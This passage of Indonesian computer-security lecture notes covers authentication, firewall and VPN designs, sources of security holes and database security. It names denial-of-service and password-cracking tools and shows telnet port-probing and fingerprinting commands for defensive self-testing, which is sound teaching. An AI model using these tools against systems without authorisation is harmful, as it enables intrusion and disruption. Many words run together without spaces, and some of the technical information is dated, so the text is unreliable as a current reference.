OwnerManagedocument Semuauserprint 3. Mengontrolprintjob,terdiridari: Settingwaktucetak Prioritas Notifikasi(orangyangperludiberiperingatan) 4. Setauditinginformation 7.KeamananRegistry Toolsyangdisediakandalampengaksesanregistry: System policy editor : mengontrol akses terhadap registry editor, memungkinkan administrator mengedit dan memodifikasi value tertentu dalam registry dengan berbasis grafis. Registry editor (regedit32.exe) : tools untuk melakukan edit dan modifikasi value dalam registry. Windows NT Diagnostics (winmsd.exe) : memungkinkan user melihat setting isi registry danvaluenyatanpaharusmasukkeregistryeditorsendiri. Toolsbackupuntukregistryyaitu: Regback.exememanfaatkancommandline/remotesessionuntukmembackuprregistry. ntbackup.exe : otomatisasi backup HANYA pada Tape drive, termasuk sebuah kopi dari file backupregistrylocal. EmergencyRepairDisk(rdisk.exe):membackuphivesystemdansoftwaredalamregistry. 8.AuditdanPencatatanLog Pencatatanlogondanlogofftermasukpencatatandalammultientrylogin Objectaccess(pencatatanaksesobyekdanfile) PrivilegeUse(paencatatanpemakaianhakuser) AccountManagement(manajemenuserdangroup) Policychange(Pencatatanperubahankebijakankeamanan) Systemevent(pencatatanprosesrestart,shutdowndanpesansystem) Detailedtracking(pencatatanprosesdalamsystemsecaradetail)

Hal:29

KeamananKomputer

KEAMANANJARINGAN
1.MembatasiAkseskeJaringan
A.Membuattingkatanakses: Pembatasanpembatasan dapat dilakukan sehingga memperkecil peluang penembusan oleh pemakaiyangtakdiotorisasi,misalnya: Pembatasanlogin.Loginhanyadiperbolehkan: Padaterminaltertentu. Hanyaadawaktudanharitertentu. Pembatasan dengan callback (Login dapat dilakukan siapapun. Bila telah sukses login, sistem segera memutuskan koneksi dan memanggil nomor telepon yang telah disepakati, Penyusup tidak dapat menghubungi lewat sembarang saluran telepon, tapihanyapadasalurantelepontertentu). Pembatasanjumlahusahalogin. Logindibatasisampaitigakalidansegeradikuncidandiberitahukeadministrator. Semualogindirekamdansistemoperasimelaporkaninformasiinformasiberikut: Waktu,yaituwaktupemakailogin. Terminal,yaituterminaldimanapemakailogin. Tingkataksesyangdiizinkan(read/write/execute/all) B.Mekanismekendaliakses: Masalah identifikasi pemakai ketika login disebut otentifikasi pemakai (user authentication). Kebanyakanmetodeotentifikasididasarkanpadatigacara,yaitu: 1.Sesuatuyangdiketahuipemakai,misalnya: Password. Kombinasikunci. Namakecilibumertua. Dansebagainya. 2.Sesuatuyangdimilikipemakai,misalnya: Badge. Kartuidentitas. Kunci. Dansebagainya. 3.Sesuatumengenai(ciri)pemakai,misalnya: Sidikjari. Sidiksuara. Foto. Tandatangan. C.WaspadaterhadapRekayasasosial: 1. Mengakusebagieksekutifyangtidakberhasilmengakses,menghubungiadministrator viatelepon/fax. 2. Mengakusebagaiadministratoryangperlumendiagnosamasalahnetwork, menghubungienduserviaemail/fax/surat.

Hal:30

KeamananKomputer
3. Mengakusebagaipetugaskeamananecommerce,menghubungicustomeryangtelah bertransaksiuntukmengulangkembalitransaksinyadiformyangdisediakanolehnya. 4. pencuriansurat,password. 5. penyuapan,kekerasan. D.MembedakanSumberdayainternaldanEksternal: Memanfaatkanteknologifirewallyangmemisahkannetworkinternaldengannetwork eksternaldenganruletertentu. E.SistemOtentikasiUser: Def : adalah proses penentuan identitas dari seseorang yang sebenarnya, hal ini diperlukan untukmenjagakeutuhan(integrity)dankeamanan(security)data,padaprosesiniseseorang harusdibuktikansiapadirinyasebelummenggunakanlayananakses. Upayauntuklebihmengamankanproteksipassword,antaralain: 1. Salting. Menambahkanstringpendekkestringpasswordyangdiberikanpemakai sehinggamencapaipanjangpasswordtertentu. 2. Onetimepassword. Pemakaiharusmenggantipasswordsecarateratur.Upayainimembatasipeluang passwordtelahdiketahuiataudicobacobapemakailain. Bentukekstrimpendekataniniadalahonetimepassword,yaitupemakaimendapat satubukuberisidaftarpassword.Setiapkalipemakailogin,pemakaimenggunakan passwordberikutnyayangterdapatdidaftarpassword. Denganonetimepassword,pemakaidirepotkankeharusanmenjagaagarbuku passwordnyajangansampaidicuri. 3. Satudaftarpanjangpertanyaandanjawaban. Variasi terhadap password adalah mengharuskan pemakai memberi satu daftar pertanyaan panjang dan jawabannya. Pertanyaanpertanyaan dan jawabannya dipilih pemakai sehingga pemakai mudah mengingatnya dan tak perlu menuliskan di kertas. Pertanyaanberikutdapatdipakai,misalnya: SiapamertuaabangiparBadru? ApayangdiajarkanPakHarunwaktuSD? Dijalanapapertamakaliditemukansimanis? Pada saat login, komputer memilih salah satu dari pertanyaanpertanyaan secara acak,menanyakankepemakaidanmemeriksajawabanyangdiberikan. 4. Tantangantanggapan(chalengeresponse). Pemakaidiberikebebasanmemilihsuatualgoritma,misalnyax3. Ketika pemakai login, komputer menuliskan di layar angka 3. Dalam kasus ini pemakai mengetik angka 27. Algoritma dapat berbeda di pagi, sore, dan hari berbeda,dariterminalberbeda,danseterusnya. ContohProdukOtentikasiUser,antaralain: 1. SecureidACE(AccessControlEncryption) System token hardware seperti kartu kredit berdisplay, pemakai akan menginput nomor pin yang diketahui bersama, lalu memasukkan pascode bahwa dia pemilik token. 2. S/key(Bellcore)

Hal:31

KeamananKomputer
System software yang membentuk one time password (OTP) berdasarkan informasi loginterkhirdenganaturanrandomtertentu. 3. PasswordAuthenticationProtocol(PAP) ProtokolduaarahuntukPPP(PointtopointProtocol).Peermengirimpasanganuserid danpassword,authenticatormenyetujuinya. 4. ChallengeHandshakeAuthenticationProtocol(CHAP) S/key pada PAP, protocol 3 arah, authenticator mengirim pesan tantangan ke peer, peer menghitung nilai lalu mengirimkan ke authenticator, authenticator menyetujui otentikasijikajawabannyasamadengannilaitadi. 5. RemoteAuthenticationDialinUserService(RADIUS) Untuk hubungan dialup, menggunakan network access server, dari suatu host yang menjadiclientRADIUS,merupansystemsatutitikakses. 6. TerminalAccessControllerAccessControlSystem(TACACS) Protokol keamanan berbasis server dari CISCO System. Secury\ity Server terpusat dangan file password UNIX, database otentikasi, otorisasi dan akunting, fungsi digest (transmisipasswordyangtidakpolos)

2.MelindungiAsetOrganisasi
A.SecaraAdminsistratif/fisik Rencanakemungkinanterhadapbencana Programpenyaringancalonpegawaisysteminformasi Programpelatihanuser Kebijakanaksesnetwork B.SecaraTeknis B.1.PenerapanFirewall IstilahpadapenerapanFirewall Host Suatusistemkomputeryangterhubungpadasuatunetwork Bastionhost Sistemkomputeryangharusmemilikitingkatsekuritasyangtinggikarenasisteminirawan sekali terhadap serangan hacker dan cracker, karena biasanya mesin ini diekspos ke networkluar(Internet)danmerupakantitikkontakutamaparauserdariinternalnetwork. PacketFiltering Aksi dari suatu devais untuk mengatur secara selektif alur data yang melintasi suatu network. Packet filter dapat memblok atau memperbolehkan suatu paket data yang melintasi network tersebut sesuai dengan kebijaksanaan alur data yang digunakan (securitypolicy). Perimeternetwork Suatunetworktambahanyangterdapatdiantaranetworkyangdilindungidengannetwork eksternal,untukmenyediakanlayertambahandarisuatusistemsecurity.Perimeter networkjugaseringdisebutdenganDMZ(DeMillitarizedZone).

Hal:32

KeamananKomputer
KeuntunganFirewall: Firewall merupakan fokus dari segala keputusan sekuritas. Hal ini disebabkan karena Firewallmerupakansatutitiktempatkeluarmasuknyatrafikinternetpadasuatujaringan. Firewall dapat menerapkan suatu kebijaksanaan sekuritas. Banyak sekali serviceservice yangdigunakandiInternet.Tidaksemuaservicetersebutamandigunakan,olehkarenanya Firewall dapat berfungsi sebagai penjaga untuk mengawasi serviceservice mana yang dapatdigunakanuntukmenujudanmeninggalkansuatunetwork. Firewall dapat mencatat segala aktivitas yang berkaitan dengan alur data secara efisien. Semua trafik yang melalui Firewall dapat diamati dan dicatat segala aktivitas yang berkenaan dengan alur data tersebut. Dengan demikian Network Administrator dapat segera mengetahui jika terdapat aktivitasaktivitas yang berusaha untuk menyerang internalnetworkmereka. Firewall dapat digunakan untukmembatasipengunaansumberdayainformasi. Mesinyang menggunakan Firewall merupakan mesin yang terhubung pada beberapa network yang berbeda, sehingga kita dapat membatasi network mana saja yang dapat mengakses suatu serviceyangterdapatpadanetworklainnya. KelemahanFirewall: Firewall tidak dapat melindungi network dari serangan koneksi yang tidak melewatinya (terdapatpintulainmenujunetworktersebut). Firewall tidak dapat melindungi dari serangan dengan metoda baru yang belum dikenal olehFirewall. Firewalltidakdapatmelindungidariseranganvirus.

PilihanklasifikasidesainFirewall:
1.PacketFiltering Sistem paket filtering atau sering juga disebut dengan screening router adalah router yang melakukan routing paket antara internal dan eksternal network secara selektif sesuai dengan security policy yang digunakan pada network tersebut. Informasi yang digunakanuntukmenyeleksipaketpakettersebutadalah: IPaddressasal IPaddresstujuan Protocol(TCP,UDP,atauICMP) PortTCPatauUDPasal PortTCPatauUDPtujuan BeberapacontohroutingpaketselektifyangdilakukanolehScreeningRouter: Semua koneksi dari luar sistem yang menuju internal network diblokade kecuali untukkoneksiSMTP Memperbolehkan service email dan FTP, tetapi memblok serviceservice berbahaya seperti TFTP, X Window, RPC dan r service (rlogin, rsh, rcp, dan lain lain). Selain memiliki keuntungan tertentu di antaranya aplikasi screening router ini dapat bersifat transparan dan implementasinya relatif lebih murah dibandingkan metode firewall yang lain, sistem paket filtering ini memiliki beberapa kekurangan yakni : tingkat securitynya masih rendah, masih memungkinkan adanya IP Spoofing, tidak adascreeningpadalayerlayerdiatasnetworklayer. 2.ApplicationLevelGateway(ProxyServices) Proxy service merupakan aplikasi spesifik atau program server yang dijalankan pada mesin Firewall, program ini mengambil user request untuk Internet service (seperti FTP,telnet,HTTP)danmeneruskannya(bergantungpadasecuritypolicy)kehostyang

Hal:33

KeamananKomputer
dituju. Dengan kata lain adalah proxy merupakan perantara antara internal network denganeksternalnetwork(Internet). Padasisiekternalhanyadikenalmesinproxytersebut,sedangkanmesinmesinyang beradadibalikmesinproxytersebuttidakterlihat.Akibatnyasistemproxyinikurang transparanterhadapuseryangadadidalam Sistem Proxy ini efektif hanya jika pada konjungsi antara internal dan eksternal network terdapat mekanisme yang tidak memperbolehkan kedua network tersebut terlibatdalamkomunikasilangsung. Keuntungan yang dimiliki oleh sistem proxy ini adalah tingkat sekuritasnya lebih baik daripada screening router, deteksi paket yang dilakukan sampai pada layer aplikasi. Sedangkan kekurangan dari sistem ini adalah perfomansinya lebih rendah daripada screeningrouterkarenaterjadipenambahanheaderpadapaketyangdikirim,aplikasi yangdisupportolehproxyiniterbatas,sertasisteminikurangtransparan. Arsitekturdasarfirewall: Arsitektur dengan dualhomed host (kadang kadang dikenal juga sebagai dual homed gateway/DHG) Sistem DHG menggunakan sebuah komputer dengan (paling sedikit) dua network interface. Interface pertama dihubungkan dengan jaringan internal dan yang lainnya dengan Internet. Dualhomed host nya sendiri berfungsi sebagai bastion host (front terdepan,bagianterpentingdalamfirewall).

Internet
bastion host

Arsitektur dengan dual-homed host

screenedhost(screenedhostgateway/SHG) Pada topologi SHG, fungsi firewall dilakukan oleh sebuah screeningrouter dan bastion host.Routerinidikonfigurasisedemikiansehinggaakanmenolaksemuatrafikkecualiyang ditujukan ke bastion host, sedangkan pada trafik internal tidak dilakukan pembatasan. Dengan cara ini setiap client servis pada jaringan internal dapat menggunakan fasilitas komunikasistandarddenganInternettanpaharusmelaluiproxy.

Internet
router

bastion-host

Arsitektur dengan screened-host

Hal:34

KeamananKomputer
screenedsubnet(screenedsubnetgateway/SSG). Firewall dengan arsitektur screenedsubnet menggunakan dua screeningrouter dan jaringan tengah (perimeter network) antara kedua router tersebut, dimana ditempatkan bastionhost.Kelebihansusunaniniakanterlihatpadawaktuoptimasipenempatanserver.

Arsitektur dengan screened-subnet

Internet
router eksternal router internal

bastion-host jaringan tengah

B.2.PenerapanVirtualPrivatNetwork(VPN) DefenisiVPN Virtual Private Network atau Jaringan Pribadi Maya sesungguhnya sama dengan Jaringan Pribadi (Private Network/PN) pada umumnya, di mana satu jaringan komputer suatu lembaga atau perusahaan di suatu daerah atau negara terhubung dengan jaringan komputer dari satu grup perusahaan yang sama di daerah atau negara lain. Perbedaannya hanyalah pada media penghubung antar jaringan. Kalau pada PN, media penghubungnya masih merupakan milik perusahaan/grup itu sendiri, dalam VPN, media penghubungnya adalah jaringan publik seperti Internet. Dalam VPN, karena media penghubung antar jaringannya adalah jaringan publik, diperlukan pengamanandanpembatasanpembatasan.Pengamanandiperlukanuntukmenjagaagartidak sebarang orang dari jaringan publik dapat masuk ke jaringan pribadi. Yang dikecualikan hanyalah orangorang yang terdaftar atau terotentifikasi terlebih dahulu yang dapat masuk ke jaringanpribadi.Pembatasandiperlukanuntuk menjagaagartidaksemuaorangatauuserdari jaringanpribadidapatmengaksesjaringanpublik(internet). CaramembentukVPN 1.Tunnelling Sesuai dengan arti tunnel atau lorong, dalam membentuk suatu VPN ini dibuat suatu tunnel di dalam jaringan publik untuk menghubungkan antara jaringan yang satu dan jaringan lain dari suatu grup atau perusahaan.yang ingin membangun VPN tersebut. Seluruh komunikasi data antarjaringan pribadi akan melalui tunnel ini, sehingga orang atau user dari jaringan publik yang tidak memiliki izin untuk masuk tidak akan mampu untuk menyadap, mengacak atau

Hal:35

KeamananKomputer
mencuridatayangmelintasitunnelini. Adabeberapametodetunellingyang umumdipakai,di antaranya: IPXToIPTunnelling,atau PPPToIPTunnelling IPX To IP tunnelling biasa digunakan dalam jaringan VPN Novell Netware. Jadi dua jaringan Novell yang terpisah akan tetap dapat saling melakukan komunikasi data melalui jaringan publik Internet melalui tunnel ini tanpa kuatir akan adanya gangguan pihak ke3 yang ingin mengganggu atau mencuri data. Pada IPX To IP tunnelling, paket data dengan protokol IPX (standar protokol Novell) akan dibungkus (encapsulated) terlebih dahulu oleh protokol IP (standar protokol Internet) sehingga dapat melalui tunnel ini pada jaringan publik Internet. SamahalnyauntukPPPToIPtunnelling,dimanaPPPprotokoldiencapsulatedolehIPprotokol. Saat ini beberapa vendor hardware router seperti Cisco, Shiva, Bay Networks sudah menambahkankemampuanVPNdenganteknologitunnellingpadahardwaremereka. 2.Firewall Sebagaimana layaknya suatu dinding, Firewall akan bertindak sebagai pelindung atau pembatas terhadap orangorang yang tidak berhak untuk mengakses jaringan kita. Umumnya duajaringanyangterpisahyangmenggunakanFirewallyangsejenis,atauseorangremoteuser yang terhubung ke jaringan dengan menggunakan software client yang terenkripsi akan membentuk suatu VPN, meskipun media penghubung dari kedua jaringan tersebut atau penghubung antara remote user dengan jaringan tersebut adalah jaringan publik seperti Internet. Suatu jaringan yang terhubung ke Internet pasti memiliki IP address (alamat Internet) khusus untuk masingmasing komputer yang terhubung dalam jaringan tersebut. Apabila jaringan ini tidak terlindungi oleh tunnel atau firewall, IP address tadi akan dengan mudahnya dikenali atau dilacak oleh pihakpihak yang tidak diinginkan. Akibatnya data yang terdapat dalam komputer yang terhubung ke jaringan tadi akan dapat dicuri atau diubah. Dengan adanya pelindung seperti firewall, kita bisa menyembunyikan (hide) address tadi sehingga tidak dapat dilacakolehpihakpihakyangtidakdiinginkan. KemampuanfirewalldalampenerapannyapadaVPN o IP Hiding/Mapping. Kemampuan ini mengakibatkan IP address dalam jaringan dipetakan atau ditranslasikan ke suatu IP address baru. Dengan demikian IP address dalam jaringan tidakakandikenalidiInternet. o Privilege Limitation. Dengan kemampuan ini kita dapat membatasi para user dalam jaringan sesuai dengan otorisasi atau hak yang diberikan kepadanya. Misalnya, User A hanyabolehmengakseshomepage,userBbolehmengakseshomepage,emaildannews, sedangkanuserChanyabolehmengaksesemail. o OutsideLimitation.Dengankemampuaninikitadapatmembatasiparauserdalamjaringan untukhanyamengakseskealamatalamattertentudiInternetdiluardarijaringankita. o InsideLimitation.Kadangkadangkitamasihmemperbolehkanorangluaruntukmengakses informasi yang tersedia dalam salah satu komputer (misalnya Web Server) dalam jaringan kita. Selain itu, tidak diperbolehkan, atau memang sama sekali tidak dizinkan untuk mengaksesseluruhkomputeryangterhubungkejaringankita.

Hal:36

KeamananKomputer
o Password and Encrypted Authentication. Beberapa user di luar jaringan memang diizinkan untuk masuk ke jaringan kita untuk mengakses data dan sebagainya, dengan terlebih dahuluharusmemasukkanpasswordkhususyangsudahterenkripsi.

3.Mengamankansaluranterbuka
Protokol TCP/IP merupakan protocol dalam set standar yang terbuka dalam pengiriman data, untuk itulah perlu dilakukan enkripsi dalam rangka penanganan keamanan data yang diterapkanpadaprotocoltersebut,yangmeliputi: A.KeamananPandalapisanAplikasi SET(SecureElectronicsTransaction) o Menentukan bagaimana transaksi mengalir antara pemakai, pedagang dan bank. o Menentukanfungsikeamanan:digitalsignature,hashdanenkripsi. o ProdukdariMastercarddanVISAInternational. SecureHTTP o ProdukdariworkgroupIETF,diimplementasikanpadawebservermulai1995. o Menentukan mekanisme kriptografi standar untuk mengenkripsikan pengirimandatahttp PrettyGoodPrivacy(PGP) o StandarisasiRFC1991 o Membuat dan memastikan digital signature, mengenkripsi deskripsi dan mengkompresidata. SecureMIME(S/MIME) o StandarisasiRFC1521 o MIME(MultipurposeInternetMailExtension) o Menentukan cara menempelkan file untuk dikirim ke internet dengan menggunakan metode hirarki dalm pendefenisian user remi dan sertfikat digitalnya. Cybercash o StandarisasiRFC1898 o Memproses kartu kredit di internet dengan mengenkripsi dan menandatanganitransaksisecaradigital. B.KeamanandalamLapisanTransport SSL(SecureSocketLayer) o ProdukNetscape o Protocol yang menegoisasikan hubungan yang aman antara client dan server, denganmenggunakankuncienkripsi40bit. C.KeamanandalamLapisanNetwork IPsecurityProtocol:melindungiprotocolclientIPpadanetworklayer. IPAuthenticationheader IPEncapsulatingSecurityprotocol SimplekeymanagementforInternetprotocol(SKIP)

Hal:37

KeamananKomputer

InternetsecurityAssociationandkeymanagementprotocol(ISAKMP) Internetkeymanagementprotocol(IKMP) Sumber:www.ietf.org

EVALUASIKEAMANANSISTEMINFORMASI

SEBABMASALAHKEAMANANHARUSSELALUDIMONITOR: Ditemukannyalubangkeamanan(securityhole)yangbaru.Perangkatlunakdanperangkat kerasbiasanyasangatkomplekssehinggatidakmungkinuntukdiujiseratuspersen. Kadangkadangadalubangkeamananyangditimbulkanolehkecerobohanimplementasi. Kesalahankonfigurasi.Kadangkadangkarenalalaiataualpa,konfigurasisebuahsistem kurangbenarsehinggamenimbulkanlubangkeamanan.Misalnyamode(permissionatau kepemilikan)dariberkasyangmenyimpanpassword(/etc/passwddisistemUNIX)secara tidaksengajadiubahsehinggadapatdiubahatauditulisolehorangorangyangtidak berhak. Penambahanperangkatbaru(hardwaredan/atausoftware)yangmenyebabkan menurunnyatingkatsecurityatauberubahnyametodauntukmengoperasikansistem. Operatordanadministratorharusbelajarlagi.Dalammasabelajarinibanyakhalyangjauh darisempurna,misalnyaserveratausoftwaremasihmenggunakankonfigurasiawaldari vendor(denganpasswordyangsama).

SUMBERLUBANGKEAMANAN 1.SalahDisain(designflaw) Umumnyajarangterjadi.Akantetapiapabilaterjadisangatsulituntukdiperbaiki. Akibatdisainyangsalah,makabiarpundiadiimplementasikandenganbaik,kelemahan darisistemakantetapada. Contoh: LemahdisainnyaalgoritmaenkripsiROT13atauCaesarcipher,dimanakarakter digeser13hurufatau3huruf.Meskipundiimplementasikandengan programmingyangsangatteliti,siapapunyangmengetahuialgoritmanyadapat memecahkanenkripsitersebut. Kesalahandisainurutannomor(sequencenumbering)daripaketTCP/IP. Kesalahaninidapatdieksploitasisehinggatimbulmasalahyangdikenaldengan namaIPspoofing(sebuahhostmemalsukandiriseolaholahmenjadihostlain denganmembuatpaketpalsusetelahengamatiurutanpaketdarihostyang hendakdiserang). 2.Implementasikurangbaik Banyakprogramyangdiimplementasikansecaraterburuburusehinggakurangcermat dalampengkodean. Akibattidakadanyacekatautestingimplementasisuatuprogramyangbarudibuat. Contoh: Tidakmemperhatikanbatas(bound)darisebuaharraytidakdiceksehingga terjadiyangdisebutoutofboundarrayataubufferoverflowyangdapat dieksploitasi(misalnyaoverwritekevariableberikutnya).

Hal:38

KeamananKomputer

Kealpaanmemfilterkarakterkarakteryanganehanehyangdimasukkansebagai inputdarisebuahprogramsehinggasangprogramdapatmengaksesberkasatau informasiyangsemestinyatidakbolehdiakses.

3.Salahkonfigurasi Contoh: Berkasyangsemestinyatidakdapatdiubaholehpemakaisecaratidaksengaja menjadiwriteable.Apabilaberkastersebutmerupakanberkasyangpenting, sepertiberkasyangdigunakanuntukmenyimpanpassword,makaefeknyamenjadi lubangkeamanan.Kadangkalasebuahkomputerdijualdengankonfigurasiyang sangatlemah. Adanyaprogramyangsecaratidaksengajadisetmenjadisetuidrootsehingga ketikadijalankanpemakaimemilikiaksessepertisuperuser(root)yangdapat melakukanapasaja. 4.Salahmenggunakanprogramatausistem Contoh: Kesalahanmenggunakanprogramyangdijalankandenganmenggunakanaccountroot (superuser)dapatberakibatfatal. PENGUJIKEAMANANSISTEM Untukmemudahkanadministratordarisisteminformasimembutuhkanautomatedtools, perangkatpembantuotomatis,yangdapatmembantumengujiataumengevaluasi keamanansistemyangdikelola. ContohToolsTerintegrasi: Perangkatlunakbantu SistemOperasi Cops UNIX Tripwire UNIX Satan/Saint UNIX SBScan:localhostsecurityscanner UNIX Ballista<http://www.secnet.com> WindowsNT Dansebagainya(carisendiri!) ContohToolsPengujianyangdibuatparahacker: Tools Kegunaan Crack programuntukmendugaataumemecahkanpassword denganmenggunakansebuahataubeberapakamus(dictionary). Programcrackinimelakukanbruteforcecrackingdengan mencobamengenkripsikansebuahkatayangdiambildarikamus, dankemudianmembandingkanhasilenkripsidenganpassword yangingindipecahkan. landdanlatierra sistemWindows95/NTmenjadimacet(hang,lockup).Program inimengirimkansebuahpaketyangsudahdispoofedsehingga seolaholahpakettersebutberasaldarimesinyangsamadengan menggunakanportyangterbuka Pingodeath sebuahprogram(ping)yangdapatmengcrashkanWindows 95/NTdanbeberapaversiUnix. Winuke programuntukmemacetkansistemberbasisWindows

Hal:39

KeamananKomputer
Dansebagainya(carisendiri!) PROBINGSERVICES DefenisiProbing:probe(meraba)servisapasajayangtersedia.Programinijuga dapatdigunakanolehkriminaluntukmelihatservisapasajayangtersediadisistem yangakandiserangdanberdasarkandatadatayangdiperolehdapatmelancarkan serangan. ServisdiInternetumumnyadilakukandenganmenggunakanprotokolTCPatauUDP. Setiapservisdijalankandenganmenggunakanportyangberbeda,misalnya: o SMTP,untukmengirimdanmenerimaemail,TCP,port25 o POP3,untukmengambilemail,TCP,port110 Contohdiatashanyasebagiandariservisyangtersedia.DisystemUNIX,lihatberkas /etc/servicesdan/etc/inetd.confuntukmelihatservisapasajayangdijalankanoleh serverataukomputeryangbersangkutan. Pemilihanservisapasajatergantungkepadakebutuhandantingkatkeamananyang diinginkan.Sayangnyaseringkalisistemyangdibeliataudirakitmenjalankanbeberapa servisutamasebagaidefault.Kadangkadangbeberapaservisharusdimatikan karenaadakemungkinandapatdieksploitasiolehcracker.Untukituadabeberapa programyangdapatdigunakanuntukmelakukan UntukbeberapaservisyangberbasisTCP/IP,prosesprobedapatdilakukandengan menggunakanprogramtelnet.Misalnyauntukmelihatapakahadaservisemail denganmenggunakanSMTPdigunakantelnetkeport25danport110.
unix%telnettarget.host.com25 unix%telnetlocalhost110

Programpengujiprobing(pengujisemuaportotomatis): PaketprobeuntuksistemUNIX nmap strobe tcpprobe ProbeuntuksistemWindow95/98/NT NetLab Cyberkit Ogre Programyangmemonitoradanyaprobingkesystem Probingbiasanyameninggalkanjejakdiberkaslogdisystemanda.Denganmengamatientrydi dalamberkaslogdapatdiketahuiadanyaprobing.Selainitu,adajugaprogramuntuk memonitorprobesepertipaketprogramcourtney,portsentrydantcplogd. OSFINGERPRINTING

Hal:40

KeamananKomputer

Fingerprinting:AnalisaOSsistemyangditujuaagardapatmelihatdatabasekelemahan sistemyangdituju. MetodeFingerprinting: Carayangpalingkonvensional: o Servicetelnetkeserveryangdituju,jikaservertersebutkebetulanmenyediakan servistelnet,seringkaliadabanneryangmenunjukkannamaOSbesertaversinya. o ServiceFTPdiport21.Denganmelakukantelnetkeporttersebutdanmemberikan perintahSYSTandadapatmengetahuiversidariOSyangdigunakan. o MelakukanfingerkeWebserver,denganmenggunakanprogramnetcat(nc). Carafingerprintingyanglebihcanggihadalahdenganmenganalisaresponsistemterhadap permintaan(request)tertentu.MisalnyadenganmenganalisanomorurutpacketTCP/IP yangdikeluarkanolehservertersebutdapatdipersempitruangjenisdariOSyang digunakan.AdabeberapatoolsuntukmelakukandeteksiOSiniantaralain: o nmap o queso

PENGGUNAANPROGRAMPENYERANG Untukmengetahuikelemahansisteminformasiadalahdenganmenyerangdirisendiri denganpaketpaketprogrampenyerang(attack)yangdapatdiperolehdiInternet. Selainprogrampenyerangyangsifatnyaagresifmelumpuhkansistemyangdituju,adajuga programpenyerangyangsifatnyamelakukanpencurianataupenyadapandata. Untukpenyadapandata,biasanyadikenaldenganistilahsniffer.Meskipundatatidak dicurisecarafisik(dalamartianmenjadihilang),snifferinisangatberbahayakarenadia dapatdigunakanuntukmenyadappassworddaninformasiyangsensitif.Inimerupakan seranganterhadapaspekprivacy. Contohprogrampenyadap(sniffer)antaralain: o pcapture(Unix) o sniffit(Unix) o tcpdump(Unix) o WebXRay(Windows) PENGGUNAANSISTEMPEMANTAUJARINGAN Sistempemantaujaringan(networkmonitoring)dapatdigunakanuntukmengetahui adanyalubangkeamaman. Misalnyaapabilaandamemilikisebuahserveryangsemetinyahanyadapatdiaksesoleh orangdaridalam,akantetapidaripemantaujaringandapatterlihatbahwaadayang mencobamengaksesmelaluitempatlain.Selainitudenganpemantaujaringandapatjuga dilihatusahausahauntukmelumpuhkansistemdenganmelaluidenialofserviceattack (DoS)denganmengirimkanpacketyangjumlahnyaberlebihan. NetworkmonitoringbiasanyadilakukandenganmenggunakanprotokolSNMP(Simple NetworkManagementProtocol). Programnetworkmonitoring/management: Etherboy(Windows),Etherman(Unix)

Hal:41

KeamananKomputer

HPOpenview(Windows) Packetboy(Windows),Packetman(Unix) SNMPCollector(Windows) Webboy(Windows)

ProgrampemantaujaringanyangtidakmenggunakanSNMP: iplog,icmplog,updlog,yangmerupakanbagiandaripaketiploguntukmemantaupaket IP,ICMP,UDP. iptraf,sudahtermasukdalampaketLinuxDebiannetdiag netwatch,sudahtermasukdalampaketLinuxDebiannetdiag ntop,memantaujaringansepertiprogramtopyangmemantauprosesdisistemUnix trafshow,menunjukkantrafficantarhostsdalambentuktextmode

KEAMANANDATABASE
PenyeranganDatabase Informasisensitifyangtersimpandidalamdatabasedapatterbuka(disclosed)bagiorang orangyangtidakdiizinkan(unauthorized). Informasisensitifyangtersimpandidalamdatabasedapatalteredinanunacceptable manner Informasisensitifyangtersimpandidalamdatabasedapatinaccessiblebagiorangorang yangdiizinkan. theunderlyingoperatingsystemmaybeattackedmostdifficultproblem DatabaseInferenceProblem Maliciousattackermayinfersensitiveinformation(thatishidden)frominformationona databasethatisdeemednotsensitive(madepublic) Moredifficultproblem:attackermayinferinformationcombiningwhatsonthedatabase withwhatisalreadyknown DatabaseAggregationProblem Bagianbagianinformasitidaksensitive,danmenjadisensitiveketikadigabungkansecara bersamaan. Controlsfortheaggregationproblem o HoneywellLOCKDataViews(LDV)databasesystem;piecesofdatalabeledas nonsensitive,aggregateslabeledassensitive o SRISeaViewdatabasesystem;piecesofdatalabeledassensitive,aggregatesmay thenbelabeledasnonsensitive Polyinstantiation,aControlAgainstDisclosure Thisapproachinvolvesdifferentviewsofadatabaseobjectexistingforuserswithdifferent securityattributes Addressestheaggregationproblembyprovidingdifferentsecuritylabelstodifferent aggregatesseparately Addressestheinferenceproblembyprovidingameansforhidinginformationthatmaybe usedtomakeinferences

DatabaseApplicationsonSecureBases

Mostdatabaseapplicationsrelyonunderlyingservicesofanoperatingsystem Hal:42

KeamananKomputer

ExportingtheseservicesfromaTCBwouldenhancethesecurityofthe database o databasekeysimplementedusingsecuritylabelsfromunderlyingTCB o TCBkeepsauditrecordsofoperationsondatabase o OSfilesystemprotectionextendedtodatabase

Hal:43

KeamananKomputer

DISCLAIMER
Bismillahirohmanirrohim Berangkat dari niat menyampaikan ilmu, dapatlah kiranya timbul suatu harapan agar diktat tulisan rangkum materi reorganizing paper yang telah dibuat ini dapat bermanfaat bagi semua yang membutuhkannya. Siapa pun dipersilahkan untuk mengambilnya, mengutipnya, memanfaatkannya dengan semaksimal mungkin. Silahkan memperbanyak, mencetak, meng-copy-nya dengan bebas guna kelancaran transfer ilmu pengetahuan. Dan apabila dimanfaatkan untuk sesuatu yang bersifat komersial, ada baiknya dapat mengabarkan terlebih dahulu, sekedar pemberitahuan, atas kehormatan yang diberikan tersebut.

Mohammad Iqbal, Skom, MMSi

mohiqbal@softhome.net

Hal:44